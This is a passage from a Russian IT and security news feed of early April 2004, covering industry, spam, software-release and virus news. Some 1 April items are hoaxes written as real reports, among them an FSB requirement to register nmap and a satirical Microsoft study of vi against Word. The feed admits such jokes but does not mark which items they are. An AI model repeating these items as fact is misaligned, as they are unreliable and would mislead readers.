задержание в тот же день, когда полиция Таиланда получила от нас международный ордер на арест этого гражданина Украины".
Подробности - http://www.cnews.ru/newtop/index.shtml?2004/04/05/157235

5/04/2004 13:44 Microsoft заплатила - Sun Microsystems довольна.
Корпорация Microsoft урегулировала длительный судебный спор с компанией Sun Microsystems, сообщается на сайте газеты Financial Times. На прошлой неделе было достигнуто соглашение, по которому Microsoft выплатит 1,6 миллиарда долларов за патенты Sun и за отказ от исков, обвиняющих корпорацию Билла Гейтса в нарушении антимонопольного законодательства. По мнению руководства Microsoft, это соглашение укрепит позиции корпорации в споре с Европейским Союзом, который наложил на нее штраф на сумму в 613,5 миллиона долларов за преднамеренное ограничение доступа потребителей к аудиовизуальному программному обеспечению других производителей. Именно Sun Microsystems обратила пять лет назад внимание Евросоюза на нарушение со стороны ее конкурента, подав официальную жалобу в Брюссель. После того как Еврокомиссия вынесла решение по этому делу, Sun уже не может отозвать свой иск обратно, и, по словам главы юридического департамента компании, этот вопрос теперь фактически касается только отношений между Microsoft и ЕС.
Подробности - http://news.ft.com/servlet/ContentServer?...

4/04/2004 16:25 ICANN начала борьбу с недостоверной WHOIS информацией
Из отчета ICANN (Internet Corporation for Assigned Names and Numbers) следует, что из 24,148 поступивших за последние 18 месяцев жалоб (16,045 доменов, 8,103 повторных жалоб, 82% - .com домены) в 5000 фигурируют домены с некорректной или недопустимо скудной информацией в базе, сообщает opennet.ru. И это несмотря на то, что регистратор (всего 192 регистраторов) обязан поместить в базу полные и реальные данные о владельце домена. К каким мерам прибегнет ICANN покажет будущее.
Подробности - http://internetnews.com/xSP/article.php/3334181

4/04/2004 16:10 Для львовских спамеров соорудили "позорный столб".
Теперь список львовских спамеров будет публиковаться на специальной странице в Интернете с названием "Ганебний стовп" ("Позорный столб"). На "столбе" для публичного бичевания будут вывешивать полную публично доступную информацию о людях или фирмах, которые причастны к этому способу рекламы. "Позорный столб", согласно историческим сведениям, использовался как наказание для преступников в 16-19 веках в Западной Европе. Человека, совершившего преступление привязывали к столбу, который в большинстве случаев устанавливали в людном месте. Как утверждают авторы проекта, "во Львове позорный столб стоял на площади Рынок, прохожие имели полное право глумиться над наказанным и считали своим долгом плюнуть ему в лицо. Люди, оказавшиеся около позорного столба навсегда теряли уважение и до конца жизни жили с этим позором". Авторы проекта акцентируют внимание на том, что спам, приносящий огромные убытки не только всей Сети, но и каждому пользователю, признан самым большим злом Интернета. "Когда-то в наши ящики приходил только англо- или русскоязычный спам. Теперь и шустрые львовяне оценили этот вид рекламы. В нашем родном доме появился вор и бороться с ним необходимо уже сейчас. Средневековье прошло, но мы в силах соорудить этот, пусть виртуальный, позорный столб, где будем публиковать с помощью всех пользователей информацию об этих тех людях и организациях, которые они представляют", - заявляют создатели сайта. Владельцы сайта призывают пересылать им новый спам, который приходит от львовских фирм и надеются, что такая форма публичного презрения "будет предостережением для всех, кто собирается прибегнуть к паразитической рекламе".
Источник - http://www.liga.net

4/04/2004 15:05 Выход ядра Linux 2.6.5.
Объявлено о выходе новой версии ядра Linux ветви 2.6. По сравнению с предыдущими версиями это ядро готовилось подольше, но и зато changelog его весит ~350Kb. Из обновлений: обновлённые драйверы ALSA; изменения/добавления в драйверах USB; изменения в коде для архитектур PPC, IA64; измениния в I2C etc.
Подробности - http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.5

4/04/2004 14:22 Война со спамом: Евросоюз закручивает гайки.
Брюссель отправил восьми государствам ЕС последнее китайское предупреждение, касающееся введения в их национальные законодательства уголовной ответственности за рассылку спама. По информации журнала InfoWorld, первое предупреждение было отправлено Брюсселем еще в ноябре прошлого года. Оно касалось девяти стран Евросоюза и было вызвано слишком уж неторопливым процессом «внедрения» принятого на общеевропейском уровне системы законодательных актов, призванной положить конец распространению спама, а также ввести в рамки приличий практику использования cookies: специальных файлов, необходимых для отслеживания перемещений пользователей интернета по Сети. Несмотря на то, что окончательной датой инкорпорации закона в национальные правовые системы стран-членов ЕС было названо 31 октября 2003 года, лишь шесть стран приняли необходимые меры, чтобы уложиться в указанную дату. Остальные девять – не обратили на нее ни малейшего внимания. Из всех стран, вызвавших гнев аппарата Евросоюза, на путь исправления встала только Швеция, а остальные восемь провинившихся – Франция, Бельгия, Люксембург, Германия, Финляндия, Греция, Нидерланды и Португалия – так и не обратили никакого специального внимания на грозную депешу, пришедшую из Брюсселя.
Подробности - http://www.infoworld.com/

4/04/2004 13:56 Домен .UA заживет новой жизнью.
Один из серверов интернет-домена .ua будет размещен в "Украинской сети обмена трафиком" (UA-IX). Это приведет к минимизации внутреннего и внешнего трафика. В правлении ассоциации "Интернет-ассоциации Украины" сообщили о том, что соответствующее решение члены правления недавно одобрили на своем заседании, пишет сайт www.comizdat.com. Директор администратора домена .ua ООО "Хостмастер" Борис Мостовой отметил, что это позволит повысить качество обслуживания пользователей и минимизировать как внутриукраинский, так и международный трафик украинских пользователей. В настоящее время сервера ООО "Хостмастер" расположены на технологических площадках различных интернет-провайдеров как в Украине, так и за ее пределами. Для домена .UA внедрена практически уникальная технология Anycast DNS, при которой ІР-адрес сервера имен находится одновременно на нескольких физических (аппаратных) серверах, а DNS запрос, посланный по Anycast адресу, доставляется на ближайший сервер. Как сообщил в интервью ForUm технический администратор домена .UA Игорь Свиридов, данная технология также применяется для обслуживания корневых серверов Интернета и есть примеры ее использования всего лишь в нескольких странах.
Источник - http://www.internet.ru

3/04/2004 18:02 Релиз Solaris 9-4/04 доступен для свободного скачивания.
SPARC и x86 версии Solaris 9-4/04 можно бесплатно скачать с сайта sun.com, при условии некоммерческого использования, сообщает www.opennet.ru.
Скачать - http://wwws.sun.com/software/solaris/binaries/get.html

3/04/2004 17:15 NTT DOCOMO в борьбе с sms-спамерами.
Японский оператор мобильной связи NTT DoCoMo http://www.nttdocomo.com/ вводит новые правила для борьбы в СМС-спамерами. Отныне, если клиент жалуется на спам в виде СМС сообщений полученных от конкретного абонента, то компания выясняет владельца трубки и обстоятельства рассылки нежелательных сообщений. В случае подтверждения факта рассылки спама, оператор ограничивает доступ к своим услугам данного абонента на определенное количество времени. Если по прошествии этого срока на данного абонента будут продолжаться жалобы на непрошенные рассылки, его отключат уже окончательно. Ранее подобные меры применялись по отношению к спамерам, использующим почтовые сервисы i-mode. За время действия программы был ограничен доступ к услугам у 3009 абонентов, и 21 из них отключены окончательно.
Источник - http://www.hpc.ru/news/nw/97/9744.shtml

3/04/2004 16:51 «Аська»: дыра в безопасности фирмы.
По информации Ferris Research, до 70% офисных работников пользуются «аськой» или другими IM-инструментами в деловых целях, целиком полагаясь на их надежность. Однако сервисы IM представляют собой огромную угрозу для безопасности фирмы. Специалисты по безопасности, конечно, знают о рисках, связанных с использованием IM-сервисов. Они должны уведомить об этом руководство и разработать комплекс мер. Если для офисного работника «аська» — это удобный деловой инструмент, то у хакера совсем иной взгляд на эту программу. Когда он видит ICQ, то для него это выглядит как открытая дверь в систему. «Аська» устроена так, что она устанавливает прямое, незашифрованное соединение между абонентами. Сразу виден IP, открыты нараспашку порты для коммуникаций. В сети имеется куча «эксплоитов», заточенных под ICQ, с помощью которых даже ребенок может получить полный доступ к компьютеру, который добровольно открылся хакеру. Есть специальные программки для подбора пароля к ICQ, для отсылки сообщений от лица любого пользователя ICQ, а также универсальные программы, позволяющие сделать с пользователем «аськи» что угодно. Вирусы все чаще используют «аську» для распространения вредоносного кода. Недавно по миру прокатилась первая глобальная эпидемия ICQ-червя. Тогда миллионы пользователей получили по ICQ ссылку на веб-страницу, где автоматически запускался на исполнение флэш-ролик с вредоносным кодом, который использовали известную брешь в браузере IE и заражал компьютер.
Источник - http://www.webplanet.ru/news/internet/2004/4/2/aska_secur.html

3/04/2004 15:08 OSVDB открывает свободный доступ.
Проект OSVDB (Open Source Vulnerability Database) завершил двухлетний подготовительный цикл, объявив об открытии свободного доступа к своей базе, сообщает bugtraq.ru. Задачей проекта является создание наиболее общей независимой базы по уязвимостям. Обещаются развитые средства поиска, заявлена поддержка Nikto, Snort и Nessus. Помимо онлайнового доступа, вся база доступна для скачивания в виде ежедневно обновляемого архива.
Подробности - http://www.osvdb.org/news.php

3/04/2004 14:22 Конкурс на лучшую статью о преимуществах Linux.
Lafox.Net объявляет конкурс на лучшую статью о преимуществах Linux. Победители конкурса получат призы. Многие пользователи персональных компьютеров (и администраторы серверов) до сих пор не используют Linux, а пользуются другими операционными системами. Те, кто используют Linux (а теперь таких просто огромное количество!) давным давно для себя решили и выяснили почему именно Linux. Но это знание находится в области "безмолвного знания". Предлагается изложить в письменном виде преимущества Linux в виде небольшой (или большой) статьи на эту тему. Такая статья должна быть ориентирована скорее не на закоренелых пользователей Linux, а на тех "несчастных", кто до сих пор перебивается, используя другие OS :))) Статьи принимаются до 10 апреля. Желающие могут принять участие.
Подробности - http://lafox.net/konkurs/

3/04/2004 13:48 Sybase выпускает новую версию EAServer 5.0.
Компания Sybase CIS объявила о выходе Sybase Enterprise Application Server 5.0 (EAServer 5.0), новой версии сервера приложений, основанного на открытых стандартах. Реконфигурируемое кэширование и функции распределения нагрузки обеспечивают производительность класса Enterprise, одновременно поддерживая целостность и непротиворечивость данных. Сервер поддерживает такие платформы, как J2EE, PowerBuilder, C/C++ и CORBA. Использование принципа создания платформенно-независимых приложений Write Once, Run Anywhere позволяет клиентам сервера работать с приложениями и сервисами разных производителей, используя ряд существующих сред, поддерживающих платформу J2EE. EAServer дает возможность управлять Web-сайтами, порталами и Internet-приложениями и создавать Web-сервисы класса Enterprise.
Источник - http://www.osp.ru

3/04/2004 13:13 Столлман угрожает Amazon бойкотом.
Amazon получила патент на способ настройки веб-страниц с использованием cookies, на что борец за свободное ПО Ричард Столлман ответил угрозой повторить уже практиковавшийся им бойкот. Столлман угрожает Amazon повторением бойкота 2000 года, если та потребует от любой другой компании лицензирования патента на cookie, которой Amazon получила во вторник. Патент, выданный Патентным бюро США и озаглавленный «Использование cookies браузера для хранения структурированных данных», относится к использованию cookies для настройки веб-сайтов. «Если на этом основании Amazon начнет преследовать какую-либо компанию, мы объявим бойкот», — заявил Столлман в письме в ZDNet. В предыдущий раз Столлман организовал бойкот Amazon в 2000 году, когда онлайновая розничная сеть возбудила безуспешный иск о нарушении своего печально известного патента на «моментальную покупку» против конкурирующего книготорговца Barns & Noble. Тогда Столлман написал открытое письмо издателю Тиму О’Рейли с объяснением причин бойкота. Оно стало ответом на заявление главы Amazon Джеффа Безоса, который предложил установить пятилетний срок действия для патентов на программное обеспечение. Столлман писал, что в таком законе нет никакой необходимости и что Amazon все равно несет ответственность за свои действия». «Среди тысяч компаний, получивших патенты на программное обеспечение, мы выбрали для бойкота Amazon, потому что она стала одной из немногих, действительно потащивших кого-то в суд. Это явное злоупотребление. Большинство обладателей патентов на программное обеспечение говорит, что эти патенты нужны им «для целей защиты» на тот случай, если им самим будет грозить судебный иск за нарушение патента. Так как это действенная стратегия самообороны, многие из этих компаний, возможно, говорят правду. Но Amazon это не извиняет, так как она выстрелила первой». Тот бойкот мало повлиял на доходы Amazon, зато вызвал бурные споры по поводу патентов на ПО, которые, как многие считают, выходят из-под контроля.
Подробности - http://news.zdnet.co.uk/internet/ecommerce/0,39020372,39150642,00.htm

3/04/2004 12:21 Новая версия открытого графического редактора GIMP.
Разработчики популярного графического редактора с открытым исходным кодом GIMP объявили о выходе окончательного варианта второй версии программы. GIMP позиционируется как бесплатная альтернатива ресурсоемким и дорогостоящим пакетам для работы с растровой графикой. В новой версии добавлен ряд функций, которые делают GIMP еще более удобным в использовании инструментом. Среди нововведений GIMP 2.0 стоит отметить следующие. Прежде всего, серьезно доработан пользовательский интерфейс. Меню стали еще понятнее, практически все возможные операции с файлом могут вызываться и из контекстного меню; улучшен инструмент "пипетка", он позволяет определить значение цвета не только в палитре RGB, но и в CMYK и HSV; усовершенствованы инструменты экспорта графических файлов; появилась возможность создавать и сохранять шаблоны изображений; добавлены новые опции в инструмент ввода текста; появились новые фильтры, новые возможности работы со слоями и многое другое. Как и прежде, для работы графического редактора под Windows понадобятся библиотеки GTK+2.
Подробности - http://brix.gimp.org/files/presspack/pressrelease.pdf

3/04/2004 11:00 Питерские студенты стали чемпионами мира по программированию.
На завершившемся 31 марта в Праге 28-м командном чемпионате мира по программированию титулы чемпионов мира и Европы завоевала команда Санкт-Петербургского государственного университета информационных технологий, механики и оптики (бывший ЛИТМО). По данным ИКТ Портала, на соревнования приехали лучшие студенты 73 университетов из 31 страны. Россия была представлена восьмью командами, но самые лучшие результаты показали Павел Маврин, Сергей Оршанский, Дмитрий Павлов, (тренировал программистов Андрей Станкевич). По правилам чемпионата, всем группам предлагалось восемь одинаковых задач, на их решение можно было потратить не более пяти часов. В зависимости от затраченного на одну задачу времени, а также от количества попыток сдать результаты своей работы, жюри могло начислить команде штрафные очки. Всего было разыграно по 4 комплекта золотых, серебряных и бронзовых медалей, которыми награждались участники, занявшие первые 12 мест. В десятку лучших попали ещё 2 российских ВУЗа - Пермский государственный университет, занявший 4-е место и Ижевский государственный технический университет, занявший 8-е место. 3-е место занял Белорусский государственный университет, что тоже очень приятно.
http://www.ict.edu.ru/

2/04/2004 15:09 ПО Guardant 4.7: новая ступень защиты.
Вышла новая версия программного обеспечения Guardant - 4.7, в которой обновлена версия генератора исходных текстов, оптимизирована работа с драйверами ключа, а также появилась новая утилита диагностики, которая автоматически собирает информацию о системе, проводит тестирование электронных ключей Guardant и подготавливает отчет для службы технической поддержки. Это позволяет пользователю защищенной программы в случае возникновения проблем нажатием кнопки отправить сгенерированный отчет специалистам (по электронной почте или по факсу), не тратя время на звонки в техподдержку и попытки описать, что произошло. Утилита может в режиме on-line по http-протоколу обновлять драйвера Guardant, а также загружать и устанавливать свежие версии самой себя. Сотрудники, занимающиеся поддержкой пользователей, теперь могут оперативно выяснить, какая ОС установлена у клиента, какая версия драйвера ключа используется, узнать конфигурацию компьютера и в какой порт вставлен электронный ключ. Разработчики Guardant настоятельно рекомендуют своим клиентам включать утилиту в комплект поставки защищенного программного продукта. Включенная в комплект разработчика новая версия генератора исходных текстов автоматически создает код интегрированных защитных модулей для нужного средства разработки, используя данные защищаемого приложения. Теперь генератор поддерживает аппаратные алгоритмы ключа с произвольным размером вопросов/ответов. Реализована также усложненная логика работы сгенерированного фрагмента для защиты от атак методом brute force. Еще одна новинка версии 4.7 - возможность конфигурирования драйверов ключа из панели управления и из мастера "Установка и удаление программ".
Источник - http://www.osp.ru

2/04/2004 12:41 Ещё один хит-парад от Panda Software.
Panda Software Опубликовала свой вирусный обзор прошедшего месяца. На протяжении марта версии D и B червя Netsky были наиболее вредоносными кодами. Так Netsky.D стал причиной почти пятнадцати процентов случаев заражения, а Netsky.B - более 11 процентов. Baglepwd.zip занимает третье место (7.52% случаев заражений). Эта цифра содержит все версии Bagle, которые способны распространяться в .zip файлах, защищенных паролями. Несмотря на доминирования волны новых вирусов, четвертое место в списке занимает Downloader.L, из месяца в месяц фигурирующий в списке наиболее активных вирусов. Пятое место (немного более шести процентов) занимает Nachi.B, еще один червь, относящийся к последней «порции» вирусов. Червь запрограммирован на устранение Mydoom.A и Mydoom.B с зараженных компьютеров. Несмотря на свою добродушную натуру, вирус для распространения использует бреши в Windows.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=261

2/04/2004 12:03 Google подвергнет электронную почту перлюстрации.
Бесплатная почтовая служба от интернет-поисковика Google имеет один существенный недостаток - компания будет читать отправляемые через нее сообщения. Как сообщает Drudge Report, это будет сделано, чтобы вставить в электронное письмо рекламу, соответствующую его содержанию, и таким образом компенсировать расходы на предоставление почтового ящика объемом в 1 гигабайт. Для сравнения, оплата почтового ящика объемом в 100 мегабайт обойдется на почтовых сервисах Yahoo и MSN в 50 и 60 долларов соответственно. Google, правда, уточняет, что электронную почту сотрудники компании читать не будут, а анализ содержания сообщения будет осуществляться компьютером. Однако, специалисты считают, что такая агрессивная реклама, несмотря на ее избирательность, может оказаться ахиллесовой пятой для компании, поскольку отпугнет многих пользователей.
Источник - http://www.lenta.ru

2/04/2004 10:39 Microsoft отучит правительства от пиратства скидками.
Программное обеспечение Microsoft используют бесплатно не только домашние пользователи и представители бизнеса. Правительства развивающихся стран, не имеющие возможности заплатить за Windows и Office полную стоимость, устанавливают у себя нелицензионные копии. Корпорация следит за такими случаями и пытается хоть как-то отучить государственных деятелей от пиратства. Например, скидками. В настоящее время Microsoft близок к заключению соглашения с правительством Ямайки о покупке его программ по цене, ниже рыночной. В этой стране половина всех "государственных" компьютеров работает на нелицензионном ПО, а уровень компьютерного пиратства среди граждан и бизнеса - 70%, по данным Business Software Alliance. Окончательная стоимость сделки по легализации программ на Ямайке пока не определена, но не это важно для Microsoft - покупка его ПО на высшем уровне послужит примером для остальных граждан, и позволит ужесточить законы в сфере защиты авторских прав. В марте корпорация уже подписала два подобных соглашения - с правительствами Ганы и Анголы. Кроме скидок, Microsoft пообещал провести бесплатное обучение работе на компьютере и не брать денег за лицензии на Windows 98 и Windows 2000, установленных на компьютерах секонд-хэнд.
Источник - http://www.cnews.ru

2/04/2004 10:22 Corel опробует WordPerfect для Linux.
Во второй половине месяца компания Corel начнет эксперимент по оценке Linux-версии своего офисного ПО WordPerfect. Представитель компании сообщил, что 15 апреля в ее онлайновый магазин поступит «экспериментальная» версия WordPerfect, специально разработанная под Linux. «Этот пилотный проект должен определить целесообразность дальнейшей разработки будущих версий WordPerfect или WordPerfect Office для Linux», — пояснил представитель. Corel уже выпускала специальную Linux-версию WordPerfect 8 в 1998 году, а в 2000 году предложила переведенную на Linux версию WordPerfect 9 — Linux тогда считалась краеугольным камнем стратегии компании. С тех пор Corel отступила от Linux и пережила трудные времена, когда ей пришлось принять финансовую помощь в $135 млн от Microsoft. В прошлом году контрольный пакет акций Corel перешел в руки венчурного капиталиста Vector Capital за $98 млн. При этом компания избавилась от нескольких подразделений и уволила часть сотрудников, сосредоточившись на том, что новые владельцы считают ее основными направлениями бизнеса: на графическом ПО и WordPerfect. Несколько лет назад пакет WordPerfect добился заметных успехов на рынке — крупные производители ПК начали предустанавливать его на недорогие модели своих компьютеров. Однако большой прибыли эти сделки компании не принесли. В этом месяце Corel планирует выпустить версию WordPerfect 12, обещая такие усовершенствования в инструментах и интерфейсе, которые сделают продукт не уступающим пакету Microsoft Office, доминирующему на рынке.
Источник - http://www.zdnet.ru

2/04/2004 09:55 1 апреля в Рунете убили Торвальдса и "посадили" Касперского.
Да... Вчера рунет оторвался по полной. На различных сайтах (в том числе и на нашем, естественно) среди вполне легитимных новостей публиковались (также естественно) "первоапрельские" шутки. Сайт securitylab.ru опубликовал информацию о самоубийстве Линуса Торвальдса, который "нанес себе 160 ножевых ранений (77 в спину и 83 – в живот), затем надел пиджак, любимый галстук с пингвинчиками, сел в кресло и скончался от потери крови". Попутно сайт "обвинил" знаменитую "Лабораторию Касперского" в распространии трояно-вирусов с "предъявлением" обвинений САМОМУ (попутно при этом продав фирму Microsoft). Арви Великий-и-ужасный был отправлен в Непал вместе со своими последователями. Надо сказать, что при обсуждении новостей часть пользователей приняла всё за чистую монету (либо сделал вид). Lenta.ru "создала" на Гугле почтовые ящики пользователей размером в 1 ГБ. Compulenta помимо прочих приколов запустила в космос космическую станцию "Королёв", запретил Евроме вживлять людям мобильники. IXBT запустил новый формат CD-дисков размером с виниловую пластинку, UNISEL рассказал, как из обычного мобильника сделать раскладушку (распилив его пополам). Softodrom выложил на своём сайте релиз "новейшей операционной системы" Microsoft Longhorn RUS, выпущенной специально для русскоязычных пользователей "всего за тридцать рублей - именно столько стоит доставка по почте инсталляционного компакт-диска по России (стоимость доставки для других стран НСГ - 45 руб)". Bugtraq.ru пошутил насчёт покупки IIS cканера nmap (очень близко почему-то к нашей шутке пришлось ;)), о биометрии интимного свойства, а также о криптографии и контролем над стрелковым оружием. Что правда, а что нет на нашем сайте - мы писать н будем - предоставляем вам право попытаться разобратьсяв этом. Просто скажем, что процент шутки во вчерашнем объёме новостей сотавлял около 40 процентов. ;)
Источник - /dev/eyes

1/04/2004 18:16 Принято решение о создании домена Московской области.
Почти в предыдущую тему. Тот же РосНИИРОС рассматривает рабочее предложение губернатора Московской области о создании специального домена Московской области. Предполагается, что домен будет иметь имя .mos. Создание домена позволит разгрузить DNS-сервера, отвечающие за домен .ru. Делегирование полномочий отвественности за зону .mos предполагается отдать одному из серверов, установленных в "кузнице кадров науки" МГУ. На сайте РосНИИРОС собираются предварительные заявки на включение в этот домен. Предполагается, что в первую очередь будут рассматриваться заявки государственных предприятий, предприятий космической отрасли и оборонных предприятий, которых, как известно, довольно много в Московской области. Таким образом предполагается вынести часть производственно-научного потенциала области в отдельный домен.
Источник - http://www.nic.ru

1/04/2004 17:50 Домену .RU — 10 лет.
РосНИИРОС сообщает, что 7-го апреля сего года в Центре международной торговли на Краснопресненской набережной состоится заседание, посвященное десятилетию домена .RU. В пресс-релизе, посвященном этому событию и опубликованном на сайте РосНИИРОС, сказано (орфография и пунктуация подлинника сохраняются): В торжественном заседании примут участие руководители Министерства транспорта и связи Российской Федерации, представители Координационного центра национального домена сети Интернет, Российского НИИ развития общественных сетей, Ассоциации документальной электросвязи, Регионального общественного центра Интернет-технологий, Союза операторов Интернет, а также видные деятели Интернет-сообщества. Участники заседания обсудят результаты развития национального домена за десятилетний период и его дальнейшие перспективы. В рамках мероприятия состоится награждение основателей российского Интернета. Организаторы официального мероприятия — АНО «Координационный центр национального домена сети Интернет» и Российский НИИ развития общественных сетей.
Источник - http://www.ripn.net:8080/

1/04/2004 17:29 Опубликован исходный код WinBlox.
По многочисленным просьбам трудящихся, Лю Ди Ю опубликовал исходный код его монитора безопасности WinBlox, о котором мы сообщали ранее в наших новостях. Исходный код довольно мал и состоит из 600 строк кода на С++. Желающие могут скачать и ознакомиться. Кстати, вчера в Bugtraq прошла информация о наличии уязвимости в этом мониторе.
Исходники - http://umbrella.name/winblox/

1/04/2004 16:20 Минобороны США обяжет своих сотрудников шифровать беспроводные сообщения.
Министерство обороны США в ближайшее время намеревается издать руководство по использованию WiFi-оборудования. Соответствующее заявление сделал директор департамента беспроводных технологий Рональд Джост (Ronald Jost), сообщает сайт газеты Washington Post. Новый документ будет содержать положение, согласно которому любые данные, независимо от степени их секретности, должны будут передаваться по беспроводным каналам только в зашифрованном виде. Вместе с тем Министерство обороны намеревается активно внедрять технологии WiFi и в перспективе полностью заменить ими проводные локальные компьютерные сети (LAN). Инструкции по использованию беспроводных сетей для передачи секретной и несекретной информации будут размещены на специальных сайтах, созданных специалистами военного ведомства США. Помимо создания руководства по эксплуатации WiFi-оборудования, в Министерстве обороны создают положение о пользовании мобильной связью. По словам Джоста, его департамент установит особые отношения с компаниями, которые будут обеспечивать военных мобильными технологиями. Для участия в тендере всем компаниям необходимо будет предъявить сертификат о защищенности своего оборудования.
Источник - http://www.viruslist.ru

1/04/2004 15:34 Все российские пользователи nmap обязаны его зарегистрировать.
На сайте ФСБ помещено объявление, что все пользователи одного из самых лучших сканеров nmap, автором которого является Fyodor, обязаны в месячный срок зарегистрировать этот сканер в органах ФАПСИ, ввиду особой опасности этого сканера, поскольку позволяет удалённо определить тип операционной системы, а также наличие скрытого (stealth) сканирования. После регистрации каждый пользователь получит уже откомпилированный под необходимую ОС код, в который, по достоверным сведениям, встроен идентификатор, уникальный для каждого зарегистрированного пользователя. Код сканера будет построен таким образом, что при выполнении сканирования в пакетах будет передаваться идентификатор, по которому при анализе лог-файлов можно однозначно определить откуда велось сканирование. Кроме того, втайне готовится внесение поправок в УК РФ с целью включения туда статьи за несанкционированное сканирование. Наказание предусматривается в виде условного наказания или штрафа, размер которого пока не разглашается. Таким вот неоднозначным способом доблестные органы намерены положить конец вечным спорам насколько наказуемы попытки сканировавния. После 1-го мая все уличённые в сканировании с использованием сканера nmap, версия которого не зарегистрирована, будут взятты на заметку ФАПСИ для дальнейшей разработки.
Источник - http://www.fsb.ru

1/04/2004 14:30 Выход GNOME 2.6.
С недельной задержкой (обусловленной компрометацией сайта) вышла GNU Network Object Model Environment 2.6. Новый вид Наутилуса, новая версия 2.4 GTK (наконец, с навороченным диалогом открытия файлов). Улучшенная работа с сетью (включая SMB), интеграция с PIM Evolution (evolution-data-server официально включен в GNOME и используется в некоторых модулях). И многое, многое, другое.
Подробности - http://www.gnome.org/start/2.6/

1/04/2004 13:46 Выход Service Pack 6 для Visual Studio 6.
Microsoft выпустила 6-й сервис-пак для Visual Studio 6. Устранено огромное количество багов. Как пишет сама фирма, каждый сервис-пак является кумулятивным, то есть будучи установленным, закрывает баги, которые были устранены в предыдущих сервис-паках.
http://support.microsoft.com/default.aspx?scid=kb;en-us;834001

1/04/2004 13:18 Криминал вторгается в Интернет.
20 января 2004 года на проходящей в Москве международной конференции "Мировое сообщество против глобализации преступности и терроризма" заместитель секретаря Совета безопасности РФ Валентин Степанков рассказал о состоянии преступности в России. По его словам, в период с 1999 по 2003 годы количество заказных преступлений, совершенных организованными преступными группировками и сообществами, увеличилось в восемь раз - с 3,3 тысяч до примерно 25 тысяч преступлений. Из этого числа каждое третье преступление связано с контрабандой, каждое четвертое - с террором, каждое пятое - заказное убийство. Криминал активно вторгается в Интернет. Количество компьютерных преступлений за год выросло на 86,2% и составило 7 540. Вопреки легендам о неуловимых хакерах почти все случаи такого рода (7 186) были раскрыты. Кстати, если преступление не раскрыли по горячим следам, то шансы найти исполнителей быстро уменьшаются: в 2003 году число расследованных «старых».
Источник - http://www.crime-research.ru

1/04/2004 12:35 Microsoft анонсировала Service Pack 2 для Windows XP.
Представители компании Microsoft объявили о планируемом выпуске очередного пакета обновления для операционной системы Windows XP. По их словам, выход пакета, получившего наименование Service Pack 2 (SP2), намечен на конец июня этого года. Как заявил руководитель одной из групп разработчиков Мэтт Пилла (Matt Pilla), новое обновление прежде всего предназначено для решения проблем безопасности пользовательских систем. Специалисты Microsoft отмечают, что со времени выхода первой версии Windows XP ощутимо изменилась ситуация в этой области - сетевые злоумышленники теперь действуют более изощренно, в то время как к общественным сетям подключается все больше людей. Второй пакет обновления призван адекватно отреагировать на все эти изменения. В частности, в Microsoft постарались уделить особое внимание защите системы от хакерских атак, вирусов и спаммерских приемов. Так, по данным BBC News, в обновленных системах будет поддерживаться защита от всплывающих окон браузера, будут изменены многие установки по умолчанию в пользу лучшей защищенности (например, будет отключена встроенная графика в сообщениях электронной почты, по умолчанию будет работать встроенный межсетевой экран).
http://www.lenta.ru

1/04/2004 11:45 Почему Вы должны использовать MS Word вместо vi.
Не относящаяся к безопасности, но интересная новость. Согласно информации с сайта humorix.org, корпорация Microsoft провела исследование, в результате которого выяснилось, что общие затраты на использование редактора MS Word на 94% ниже, нежели при использовании vi. "Даже нельзя сравнивать", заявил один из исследователей. "Мы не можем поверить, что сегодня кто-то может всерьёз использовать столь примитивный редактор, как vi, в этот день и в этом веке. То же самое можно сказать обо всех дистрибутивах Linux, для них vi является естественным редактором". Отчет, озаглавленный "Using Anything But Word Is Truly Absurd", называет несколько причин, по которым vi хуже по сравнению с инновационным решением от Microsoft. Среди них:
1) vi создает файлы с нестандартным окончанием строк, что конфиликтует с приложениями, ориентированными на работу в DOS/Windows.
2) Многие скобки, кавычки и даже символы столь хорошо знакомого пользователям Word шрифта Wingdings в vi просто недоступны.
3) хотя некоторая автоматизация возможна и в vi/Linux, она не может сравниться по мощи с макросами MS Word, с помощью которых можно не только создавать, но и удалять файлы, посылать e-mail'ы, и даже изменять разбивку жесткого диска на партиции.
3) vi основан на очень недружелюбной к пользователю технологии 1970-х годов, не предусматривашей такие элементарные вещи как мастера(визарды), анимированных помощников панелей инструментов, которых в Word чуть ли не тысяча.
4) Лицензионные соглашения на vi и Linux включают в себя атрибуты вируса, который может заминировать весь ваш бизнес-план. Не случайно произнося слово "virus" не возможно не произнести "vi".
5) с помощью MS Word вы можете без труда перевести файл во множество разных форматов, включая HTML и XML, в редакторе vi вам придется вводить все эти мистические тэги и самому кодировать в этом формате.
"И это всего лишь вершина айсберга", похвалился один из авторов отчета, служащий специального отделения Microsoft. Мы даже не упоминали о многих странностях vi, таких как необходимость использования "диких" команд, включающих двоеточие и восклицательный знак для выполнения элементарных действий. Директор одной из небольших фирм сказал: "Мы полагали, что сможем сэкономить немного денег, поставив недорогую по сравнению с Windows ОС Linux. Но когда я попросил своего племянника, нашего IT-специалиста, имеющего сертификат MCSE, изучить редактор vi, он вырвал себе чуть ли не все волосы на голове, от огорчения, что не смог выполнить такую простейшую операцию как сохранение файла. Стало ясно, что наш эксперимент с Linux оказался настоящей катастрофой." И действительно, исследования показали, что использующие vi имееют в среднем на 12% меньше волос, чем использующие MS Word. "Это не может быть простым совпадением... Очевидно, пользователи vi более предрасположены к вырыванию своих волос", сказано в заключении. Комментируя, один из независимых экспертов заметил: "Остается не вполне ясным, какая методика использовалась при проведении исследования. Но тот факт, что Microsoft решила опубликовать результаты, заставлет им верить... если не доверять Microsoft, кому же тогда доверять?!"
http://humorix.org/articles/2004/03/vi-vs-word/

1/04/2004 09:09 Внимание! Новый, крайне опасный червь.
